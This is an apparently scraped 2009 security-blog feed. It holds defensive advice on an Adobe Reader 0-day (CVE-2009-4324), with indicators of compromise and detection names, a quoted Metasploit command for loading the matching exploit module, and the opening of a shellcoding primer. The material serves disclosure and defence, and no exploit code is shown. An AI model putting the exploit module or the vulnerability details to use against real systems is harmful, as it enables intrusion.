<p class="MsoNormal">SecuriTeam Blogs contains several FAQ documents about MS Office vulnerabilities used in targeted attacks <a href="http://blogs.securiteam.com/index.php/archives/451">since 2006</a>. This time I&#8217;m not writing a FAQ. This document has answers to <em>What this means</em> type questions.</p>
<p><strong><span style="font-size: 12pt; font-family: Cambria">What an organization can make to protect?</span></strong></p>
<p><meta name="Title" /> <meta name="Keywords" /> <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <meta content="Word.Document" name="ProgId" /> <meta content="Microsoft Word 2008" name="Generator" /> <meta content="Microsoft Word 2008" name="Originator" /></p>
<link rel="File-List" /><!--[if gte mso 9]><xml>  <o :DocumentProperties>   </o><o :Template>Normal.dotm</o>   <o :Revision>0</o>   <o :TotalTime>0</o>   <o :Pages>1</o>   <o :Words>40</o>   <o :Characters>233</o>   <o :Company></o>   <o :Lines>1</o>   <o :Paragraphs>1</o>   <o :CharactersWithSpaces>286</o>   <o :Version>12.0</o>    <o :OfficeDocumentSettings>   <o :AllowPNG/>  </o> </xml>< ![endif]--><!--[if gte mso 9]><xml>  <w :WordDocument>   </w><w :Zoom>0</w>   <w :TrackMoves>false</w>   <w :TrackFormatting/>   <w :PunctuationKerning/>   <w :DrawingGridHorizontalSpacing>18 pt</w>   <w :DrawingGridVerticalSpacing>18 pt</w>   <w :DisplayHorizontalDrawingGridEvery>0</w>   <w :DisplayVerticalDrawingGridEvery>0</w>   <w :ValidateAgainstSchemas/>   <w :SaveIfXMLInvalid>false</w>   <w :IgnoreMixedContent>false</w>   <w :AlwaysShowPlaceholderText>false</w>   <w :Compatibility>    <w :BreakWrappedTables/>    <w :DontGrowAutofit/>    <w :DontAutofitConstrainedTables/>    <w :DontVertAlignInTxbx/>   </w>   </xml>< ![endif]--><!--[if gte mso 9]><xml>  <w :LatentStyles DefLockedState="false" LatentStyleCount="276">  </w> </xml>< ![endif]--> <style> <!--  /* Font Definitions */ @font-face 	{font-family:Cambria; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:3 0 0 0 1 0;}  /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0cm; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-ascii-font-family:Cambria; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Cambria; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Cambria; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} @page Section1 	{size:612.0pt 792.0pt; 	margin:72.0pt 90.0pt 72.0pt 90.0pt; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --> </style> <!--[if gte mso 10]> <style>  /* Style Definitions */ table.MsoNormalTable 	{mso-style-name:&#8221;Table Normal&#8221;; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:&#8221;"; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:&#8221;Times New Roman&#8221;; 	mso-ascii-font-family:Cambria; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:&#8221;Times New Roman&#8221;; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Cambria; 	mso-hansi-theme-font:minor-latin;} </style> < ![endif]-->  <!--StartFragment-->
<p class="MsoNormal">#1 Disable JavaScript. Deploy a system to deliver this setting to all workstations. This is not the last Adobe 0-day which we will see.</p>
<p class="MsoNormal">
<p class="MsoNormal"><em>What this means?</em></p>
<p class="MsoNormal">
<p class="MsoNormal">Go to Edit>Preferences menu, select item &#8216;JavaScript&#8217;, Uncheck &#8220;Enable Acrobat JavaScript&#8221; and to save the setting click &#8216;OK&#8217;.</p>
<p class="MsoNormal">
<p><meta name="Title" /> <meta name="Keywords" /> <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <meta content="Word.Document" name="ProgId" /> <meta content="Microsoft Word 2008" name="Generator" /> <meta content="Microsoft Word 2008" name="Originator" /></p>
<link rel="File-List" /><!--[if gte mso 9]><xml>  <o :DocumentProperties>   </o><o :Template>Normal.dotm</o>   <o :Revision>0</o>   <o :TotalTime>0</o>   <o :Pages>1</o>   <o :Words>59</o>   <o :Characters>339</o>   <o :Company></o>   <o :Lines>2</o>   <o :Paragraphs>1</o>   <o :CharactersWithSpaces>416</o>   <o :Version>12.0</o>    <o :OfficeDocumentSettings>   <o :AllowPNG/>  </o> </xml>< ![endif]--><!--[if gte mso 9]><xml>  <w :WordDocument>   </w><w :Zoom>0</w>   <w :TrackMoves>false</w>   <w :TrackFormatting/>   <w :PunctuationKerning/>   <w :DrawingGridHorizontalSpacing>18 pt</w>   <w :DrawingGridVerticalSpacing>18 pt</w>   <w :DisplayHorizontalDrawingGridEvery>0</w>   <w :DisplayVerticalDrawingGridEvery>0</w>   <w :ValidateAgainstSchemas/>   <w :SaveIfXMLInvalid>false</w>   <w :IgnoreMixedContent>false</w>   <w :AlwaysShowPlaceholderText>false</w>   <w :Compatibility>    <w :BreakWrappedTables/>    <w :DontGrowAutofit/>    <w :DontAutofitConstrainedTables/>    <w :DontVertAlignInTxbx/>   </w>   </xml>< ![endif]--><!--[if gte mso 9]><xml>  <w :LatentStyles DefLockedState="false" LatentStyleCount="276">  </w> </xml>< ![endif]--> <style> <!--  /* Font Definitions */ @font-face 	{font-family:Cambria; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:3 0 0 0 1 0;}  /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0cm; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-ascii-font-family:Cambria; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Cambria; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Cambria; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} @page Section1 	{size:612.0pt 792.0pt; 	margin:72.0pt 90.0pt 72.0pt 90.0pt; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --> </style> <!--[if gte mso 10]> <style>  /* Style Definitions */ table.MsoNormalTable 	{mso-style-name:&#8221;Table Normal&#8221;; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:&#8221;"; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:&#8221;Times New Roman&#8221;; 	mso-ascii-font-family:Cambria; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:&#8221;Times New Roman&#8221;; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Cambria; 	mso-hansi-theme-font:minor-latin;} </style> < ![endif]-->  <!--StartFragment-->
<p class="MsoNormal">#2 Enable DEP</p>
<p class="MsoNormal">
<p class="MsoNormal">Some Windows systems include Data Execution Prevention (DEP) functionality.</p>
<p class="MsoNormal">
<p class="MsoNormal"><em>What this means?</em></p>
<p class="MsoNormal">
<p class="MsoNormal">If your organization is using Windows versions with DEP support the code execution can be avoided.</p>
<p class="MsoNormal">
<p class="MsoNormal">Adobe has confirmed these mitigation advices in security advisory <a href="http://www.adobe.com/support/security/advisories/apsa09-07.html">APSA09-07</a>, but as mentioned DEP method doesn&#8217;t fully prevent the exploitation.</p>
<p class="MsoNormal">
<p class="MsoNormal"><meta name="Title" /><meta name="Keywords" /><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <meta content="Word.Document" name="ProgId" /> <meta content="Microsoft Word 2008" name="Generator" /> <meta content="Microsoft Word 2008" name="Originator" />  <!--[if gte mso 9]><xml>  <o :DocumentProperties>   </o><o :Template>Normal.dotm</o>   <o :Revision>0</o>   <o :TotalTime>0</o>   <o :Pages>1</o>   <o :Words>18</o>   <o :Characters>107</o>   <o :Company></o>   <o :Lines>1</o>   <o :Paragraphs>1</o>   <o :CharactersWithSpaces>131</o>   <o :Version>12.0</o>    <o :OfficeDocumentSettings>   <o :AllowPNG/>  </o> </xml>< ![endif]--><!--[if gte mso 9]><xml>  <w :WordDocument>   </w><w :Zoom>0</w>   <w :TrackMoves>false</w>   <w :TrackFormatting/>   <w :PunctuationKerning/>   <w :DrawingGridHorizontalSpacing>18 pt</w>   <w :DrawingGridVerticalSpacing>18 pt</w>   <w :DisplayHorizontalDrawingGridEvery>0</w>   <w :DisplayVerticalDrawingGridEvery>0</w>   <w :ValidateAgainstSchemas/>   <w :SaveIfXMLInvalid>false</w>   <w :IgnoreMixedContent>false</w>   <w :AlwaysShowPlaceholderText>false</w>   <w :Compatibility>    <w :BreakWrappedTables/>    <w :DontGrowAutofit/>    <w :DontAutofitConstrainedTables/>    <w :DontVertAlignInTxbx/>   </w>   </xml>< ![endif]--><!--[if gte mso 9]><xml>  <w :LatentStyles DefLockedState="false" LatentStyleCount="276">  </w> </xml>< ![endif]--> <style> <!--  /* Font Definitions */ @font-face 	{font-family:Cambria; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:3 0 0 0 1 0;}  /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0cm; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-ascii-font-family:Cambria; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Cambria; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Cambria; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} @page Section1 	{size:612.0pt 792.0pt; 	margin:72.0pt 90.0pt 72.0pt 90.0pt; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --> </style> <!--[if gte mso 10]> <style>  /* Style Definitions */ table.MsoNormalTable 	{mso-style-name:&#8221;Table Normal&#8221;; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:&#8221;"; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:&#8221;Times New Roman&#8221;; 	mso-ascii-font-family:Cambria; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:&#8221;Times New Roman&#8221;; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Cambria; 	mso-hansi-theme-font:minor-latin;} </style> < ![endif]-->  <!--StartFragment-->#3 Do not open PDF documents from unknown sources AND received unexpectedly.</p>
<p class="MsoNormal">
<p class="MsoNormal"><em>What this means?</em></p>
<p class="MsoNormal">
<p class="MsoNormal">If you don&#8217;t know the sender who is sending you file attachments there is always a risk that you are a victim of targeted attack. Remember that the sender can be easily spoofed as well.</p>
<p class="MsoNormal">
<p class="MsoNormal"><meta name="Title" /> <meta name="Keywords" /> <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <meta content="Word.Document" name="ProgId" /> <meta content="Microsoft Word 2008" name="Generator" /> <meta content="Microsoft Word 2008" name="Originator" /></p>
<link rel="File-List" /><!--[if gte mso 9]><xml>  <o :DocumentProperties>   </o><o :Template>Normal.dotm</o>   <o :Revision>0</o>   <o :TotalTime>0</o>   <o :Pages>1</o>   <o :Words>127</o>   <o :Characters>729</o>   <o :Company></o>   <o :Lines>6</o>   <o :Paragraphs>1</o>   <o :CharactersWithSpaces>895</o>   <o :Version>12.0</o>    <o :OfficeDocumentSettings>   <o :AllowPNG/>  </o> </xml>< ![endif]--><!--[if gte mso 9]><xml>  <w :WordDocument>   </w><w :Zoom>0</w>   <w :TrackMoves>false</w>   <w :TrackFormatting/>   <w :PunctuationKerning/>   <w :DrawingGridHorizontalSpacing>18 pt</w>   <w :DrawingGridVerticalSpacing>18 pt</w>   <w :DisplayHorizontalDrawingGridEvery>0</w>   <w :DisplayVerticalDrawingGridEvery>0</w>   <w :ValidateAgainstSchemas/>   <w :SaveIfXMLInvalid>false</w>   <w :IgnoreMixedContent>false</w>   <w :AlwaysShowPlaceholderText>false</w>   <w :Compatibility>    <w :BreakWrappedTables/>    <w :DontGrowAutofit/>    <w :DontAutofitConstrainedTables/>    <w :DontVertAlignInTxbx/>   </w>   </xml>< ![endif]--><!--[if gte mso 9]><xml>  <w :LatentStyles DefLockedState="false" LatentStyleCount="276">  </w> </xml>< ![endif]--> <style> <!--  /* Font Definitions */ @font-face 	{font-family:Cambria; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:3 0 0 0 1 0;}  /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0cm; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-ascii-font-family:Cambria; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Cambria; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Cambria; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} @page Section1 	{size:612.0pt 792.0pt; 	margin:72.0pt 90.0pt 72.0pt 90.0pt; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --> </style> <!--[if gte mso 10]> <style>  /* Style Definitions */ table.MsoNormalTable 	{mso-style-name:&#8221;Table Normal&#8221;; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:&#8221;"; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:&#8221;Times New Roman&#8221;; 	mso-ascii-font-family:Cambria; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:&#8221;Times New Roman&#8221;; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Cambria; 	mso-hansi-theme-font:minor-latin;} </style> < ![endif]-->  <!--StartFragment-->
<p class="MsoNormal">#4 Switch to alternative PDF reader.</p>
<p class="MsoNormal">
<p class="MsoNormal">There are many free and commercial products. However, they are often affected by Adobe vulnerabilities too and a patching policy is needed when switching to another product.</p>
<p class="MsoNormal">
<p class="MsoNormal"><em>What this means?</em></p>
<p class="MsoNormal">
<p class="MsoNormal">
<p class="MsoNormal">Changing the PDF reader in large organization is not an easy move. Today is a good day to start the planning project.</p>
<p class="MsoNormal">
<p class="MsoNormal">
<p class="MsoNormal">Let&#8217;s talk about technical details with some words. The vulnerability exists in Doc.media.newPlayer method. The Trojan in these attacks generated connections to http: // foruminspace dot com and http: // newsplaza dot net (these servers are located in Malaysia).</p>
<p class="MsoNormal">
<p class="MsoNormal">AV vendors use the following names when detecting the malicious PDF document:</p>
<p class="MsoNormal">
<p class="MsoNormal">Exploit.JS.Pdfka.atq (Kaspersky)</p>
<p class="MsoNormal">Exploit:W32/AdobeReader.UZ (F-Secure)</p>
<p class="MsoNormal">Exploit-PDF.ag (McAfee)</p>
<p class="MsoNormal">PDF/Pidief.NQ (CA)</p>
<p class="MsoNormal">Trojan.Pidief.H (Symantec)</p>
<p class="MsoNormal">TROJ_PIDIEF.PGS (Trend Micro)</p>
<p class="MsoNormal">Troj/PDFJs-FS (Sophos)</p>
<p class="MsoNormal">
<p class="MsoNormal">The size of the infected PDF document is 400,918 bytes. The file name varies, but it can be note200911.pdf, note_20091210.pdf or Outline of Interview.pdf.</p>
<p><!--EndFragment-->    <!--EndFragment--><span style="font-size: 12pt; font-family: Cambria" />
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1339&amp;title=Adobe+0-day+vulnerability+%28CVE-2009-4324%29+-+what+this+means%3F"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1339&amp;title=Adobe+0-day+vulnerability+%28CVE-2009-4324%29+-+what+this+means%3F"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=Adobe+0-day+vulnerability+%28CVE-2009-4324%29+-+what+this+means%3F&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1339"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1339"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1339&amp;title=Adobe+0-day+vulnerability+%28CVE-2009-4324%29+-+what+this+means%3F"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1339&amp;title=Adobe+0-day+vulnerability+%28CVE-2009-4324%29+-+what+this+means%3F"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1339&amp;title=Adobe+0-day+vulnerability+%28CVE-2009-4324%29+-+what+this+means%3F"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1339&amp;t=Adobe+0-day+vulnerability+%28CVE-2009-4324%29+-+what+this+means%3F"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1339&amp;title=Adobe+0-day+vulnerability+%28CVE-2009-4324%29+-+what+this+means%3F"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1339"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=Adobe+0-day+vulnerability+%28CVE-2009-4324%29+-+what+this+means%3F&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1339" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Let the experts make sure your website is safe. <a href="http://www.beyondsecurity.com/vulnerability-assessment.html">Vulnerability Assessment</a> is the answer.</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1339/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Latest Adobe 0-Day Exploit Now In Metasploit</title>
		<link>http://blogs.securiteam.com/index.php/archives/1338</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1338#comments</comments>
		<pubDate>Wed, 16 Dec 2009 00:52:05 +0000</pubDate>
		<dc:creator>xyberpix</dc:creator>
		
		<category>Commentary</category>

		<category>Full Disclosure</category>

		<category>Sec Tools</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1338</guid>
		<description><![CDATA[Just reading through Twitter and I saw this from HDM, and thought I&#8217;d share
&#8220;Adobe PDF 0.9-day added to Metasploit: [msf&#62; use exploit/windows/fileformat/adobe_media_newplayer.rb] (via jduck/pusscat/myself) SVN r7881&#8243;
Night All&#8230;

-
Is your site safe from SQL Injection? Website Security Audit is the way to protect your network!
]]></description>
			<content:encoded><![CDATA[<p>Just reading through Twitter and I saw this from HDM, and thought I&#8217;d share</p>
<p>&#8220;Adobe PDF 0.9-day added to Metasploit: [msf&gt; use exploit/windows/fileformat/adobe_media_newplayer.rb] (via jduck/pusscat/myself) SVN r7881&#8243;</p>
<p>Night All&#8230;
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1338&amp;title=Latest+Adobe+0-Day+Exploit+Now+In+Metasploit"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1338&amp;title=Latest+Adobe+0-Day+Exploit+Now+In+Metasploit"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=Latest+Adobe+0-Day+Exploit+Now+In+Metasploit&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1338"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1338"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1338&amp;title=Latest+Adobe+0-Day+Exploit+Now+In+Metasploit"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1338&amp;title=Latest+Adobe+0-Day+Exploit+Now+In+Metasploit"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1338&amp;title=Latest+Adobe+0-Day+Exploit+Now+In+Metasploit"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1338&amp;t=Latest+Adobe+0-Day+Exploit+Now+In+Metasploit"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1338&amp;title=Latest+Adobe+0-Day+Exploit+Now+In+Metasploit"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1338"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=Latest+Adobe+0-Day+Exploit+Now+In+Metasploit&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1338" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Is your site safe from SQL Injection? <a href="http://www.beyondsecurity.com/vulnerability-scanner.html">Website Security Audit</a> is the way to protect your network!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1338/feed/</wfw:commentRss>
		</item>
		<item>
		<title>KISS shellcoding and exploitation</title>
		<link>http://blogs.securiteam.com/index.php/archives/1329</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1329#comments</comments>
		<pubDate>Mon, 14 Dec 2009 09:51:25 +0000</pubDate>
		<dc:creator>Weis</dc:creator>
		
		<category>Commentary</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1329</guid>
		<description><![CDATA[In this blog i will talk about anything and everything to do with vulnerability exploitation. This is part of the job I do for SecuriTeam&#8217;s SSD. Those that are not aware of the project its aim is to give researchers compensation for their researcher efforts, compensation of course being money not just fame and glory [...]]]></description>
			<content:encoded><![CDATA[<p>In this blog i will talk about anything and everything to do with vulnerability exploitation. This is part of the job I do for SecuriTeam&#8217;s <a href="http://www.beyondsecurity.com/ssd.html">SSD</a>. Those that are not aware of the project its aim is to give researchers compensation for their researcher efforts, compensation of course being money not just fame and glory <img src='http://blogs.securiteam.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
The work I do revolves around exploits and shellcodes in those exploits that we receive. In this blog post I will focus mostly on simple problems and aspects of writing exploits, and show how I have solved some of these problems in the past.</p>
<p>A common sight when looking for exploitation information is complicated c-and-ugly-assembly-string exploit or shellcode.  Rather than writing up another the 287637639th exploit, I will discuss different problems and goals faced when exploiting and shellcoding.  My main focus will be explaining problems and issues often encountered and a offering simple, general approaches to a solution with an emphasis on working, easy-to-implement solutions.</p>
<p>Rather than building a full(&#8221;weaponized&#8221;) exploit i will go through the process of building a PoC.  Also, i may feel free to talk about some simple and effective ways of building an exploit-compilation framework.</p>
<p>I like to start from the beginning, but even seasoned exploiters can already prepare themselves for some surprises and twists.</p>
<p><strong>SHELLCODING PRIMER</strong></p>
<p>One of the main problems encountered when exploiting a vulnerability -  even if is is a simple stack overflow - is shellcode restrictions.  often, the nature of the specific vulnerability will prevent us from using specific bytes or force us to use certain combinations.  obviously, every constraint is different. let&#8217;s start with the classic  &#8220;zero-tolerance&#8221; restraint.  This means that our shellcode can not contain null bytes because it was probably originally part of a printable string.</p>
